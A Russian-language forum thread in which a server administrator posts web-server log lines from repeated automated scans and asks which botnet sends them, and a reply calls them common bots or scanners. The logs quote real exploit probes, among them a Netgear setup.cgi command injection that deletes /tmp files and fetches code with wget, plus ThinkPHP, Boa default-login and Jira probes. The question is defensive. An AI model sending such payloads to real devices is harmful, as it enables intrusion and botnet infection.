Атака на сервер

[user417]

Здравствуйте!
2-3 раза в день на сервер приходят подобные запросы с интервалом в 3 секунды, затем ip адрес меняется и запросы повторяются:

"GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404
"GET /bag2 HTTP/1.1" 404
"GET /TP/public/index.php HTTP/1.1" 404
"POST /users?page=&size=5 HTTP/1.1" 404
"GET /TP/index.php HTTP/1.1" 404
"GET /config/getuser?index=0 HTTP/1.1" 404
"GET /TP/public/index.php HTTP/1.1" 404
"GET /TP/index.php HTTP/1.1" 404
"GET /thinkphp/html/public/index.php HTTP/1.1" 404
"GET /html/public/index.php HTTP/1.1" 404
"GET /public/index.php HTTP/1.1" 404
"GET /TP/html/public/index.php HTTP/1.1" 404
"GET /elrekt.php HTTP/1.1" 404
"GET /index.php HTTP/1.1" 404
"POST /users?page=&size=5 HTTP/1.1" 404
"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+

Ссылка скрыта от гостей

HTTP/1.0" 404
"GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404
"POST /3535/inc/e93cc142f47fdc.php HTTP/1.1" 404
"GET /config/getuser?index=0 HTTP/1.1" 404
"POST /3535/inc/e93cc142f47fdc.php HTTP/1.1" 404
"GET /script HTTP/1.1" 404
"POST /3535/inc/e93cc142f47fdc.php HTTP/1.1" 404
"GET /config/getuser?index=0 HTTP/1.1" 404
"GET /invoker/readonly HTTP/1.1" 404
"GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404

Кто-нибудь сталкивался с подобным? Что за ботнет?

 

[Pernat1y]

Боты/сканеры, коих дофига. Можно попробовать по user agent иногда определить, если он в лог пишется.